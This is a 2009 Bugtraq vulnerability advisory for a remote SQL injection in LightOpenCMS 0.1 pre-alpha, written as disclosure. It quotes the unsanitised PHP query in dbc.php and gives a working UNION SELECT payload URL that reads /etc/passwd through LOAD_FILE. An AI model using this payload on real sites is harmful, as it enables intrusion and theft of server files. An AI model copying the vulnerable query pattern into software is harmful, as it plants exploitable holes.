Bugtraq mailing list archives
LightOpenCMS 0.1 pre-alpha Remote SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Fri, 5 Jun 2009 15:38:17 +0200
******** Salvatore "drosophila" Fresta ******** [+] Application: LightOpenCMS [+] Version: 0.1 pre-alpha [+] Website: http://sourceforge.net/projects/lightopencms [+] Bugs: [A] Remote SQL Injection [+] Exploitation: Remote [+] Date: 05 Jun 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs - [A] Remote SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: dbc.php This bug allows a guest to inject arbitrary SQL statments. ... if (isset($_GET['id'])) { $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'"); return mysql_fetch_assoc($result); ... *************************************************** [+] Code - [A] Remote SQL Injection http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23 *************************************************** [+] Fix No fix. *************************************************** -- Salvatore Fresta aka drosophila CWNP444351
Attachment:
LightOpenCMS 0.1 pre-alpha Remote SQL Injection-05062009.txt
Description:
Current thread:
- LightOpenCMS 0.1 pre-alpha Remote SQL Injection Salvatore "drosophila" Fresta (Jun 05)